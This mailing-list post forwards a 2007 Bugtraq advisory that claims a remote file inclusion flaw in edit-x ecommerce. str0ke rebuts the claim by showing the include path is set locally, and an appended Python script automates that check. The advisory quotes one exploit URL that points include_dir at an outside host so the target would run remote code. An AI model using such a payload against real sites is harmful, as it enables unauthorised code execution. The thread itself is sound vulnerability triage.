[VIM] Fwd: edit-x ecommerce (include_dir) Remote File include
str0ke
str0ke at milw0rm.com
Tue Jan 9 21:31:10 EST 2007
---------- Forwarded message ----------
From: emel_gw_ini at yahoo.com <emel_gw_ini at yahoo.com>
Date: 9 Jan 2007 21:36:33 -0000
Subject: edit-x ecommerce (include_dir) Remote File include
To: bugtraq at securityfocus.com
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew
[[inject]]---------------------------------------------------------
on file editx/edit_address.php
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");
exploit :
http://target.lu/[editx PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?
[[End]]-----------------------------------------------------------
This is pretty much what the file looks like:
ob_start();
$db_edx_host = "localhost"; // Database Hostname
$db_edx_user = ""; // Database Username
$db_edx_pass = ""; // Database Password
$db_edx_name = ""; // Database Name
$high_traffic = "N"; // Persistent Connections
$edx_index = "index"; // Default PHP File
$php = "php"; // PHP File Extension
$cda_dir = "cda"; // CDA Include Folder
$include_dir = "include"; // CMA Include Folder
$directory = ""; // Install Folder
$smarty_dir = "smarty"; // Smarty Folder
$template_dir = "template"; // Template Folder
$caching = "N"; // Caching
$debug_flag = "Y"; // Debug Flag
$debug_file = "debug.txt"; // Debug File
$edx_key = "editx_key"; // Decrypt Key
include('../cda/constants.'.$php); << doesn't seem to have anything that makes this vulnerable.
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
Seems to be another bogus.
/str0ke
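The triage above (is $include_dir assigned before it reaches include()?) can be done mechanically when checking claims like this one. The script below is an added example, not part of this thread or of the edit-x code; the two PHP samples are constructed to mirror the advisory's fragment and the fuller listing, and the check assumes a literal assignment earlier in the file means the path is not request-controlled, while an include variable never assigned is the register_globals case worth looking at.

```python
import re

# Constructed samples (not the vendor's files): the first mirrors the fragment
# quoted in the advisory, the second the fuller edit_address.php listing above.
ADVISORY_FRAGMENT = """
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");
"""

FULL_LISTING = """
$php = "php"; // PHP File Extension
$include_dir = "include"; // CMA Include Folder
include('../cda/constants.'.$php);
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
"""

# include/require whose path expression starts with a PHP variable
INCLUDE_RE = re.compile(r"\b(?:include|include_once|require|require_once)\s*\(?\s*\$(\w+)")
# literal assignment "$var = ..." (a single "=", so "==" does not count)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)")


def find_unassigned_include_vars(php_source):
    """Return [(line_no, var)] for each include/require whose leading variable
    has no assignment earlier in the file. Assumption: an assigned variable is
    not request-controlled; one never assigned could be filled from the query
    string when register_globals is on, which is what this flags."""
    assigned = set()
    hits = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        assigned.update(ASSIGN_RE.findall(line))  # assignments on this line first
        for var in INCLUDE_RE.findall(line):
            if var not in assigned:
                hits.append((line_no, var))
    return hits


def triage(php_source):
    """'investigate' if any include path variable is unassigned, else 'bogus'."""
    return "investigate" if find_unassigned_include_vars(php_source) else "bogus"


if __name__ == "__main__":
    for name, src in (("advisory fragment", ADVISORY_FRAGMENT), ("full listing", FULL_LISTING)):
        print(f"{name}: {triage(src)} {find_unassigned_include_vars(src)}")
```

Run against only the fragment the advisory quoted, the includes are flagged; run against the full file with the config block, nothing is flagged, which is the point str0ke makes above.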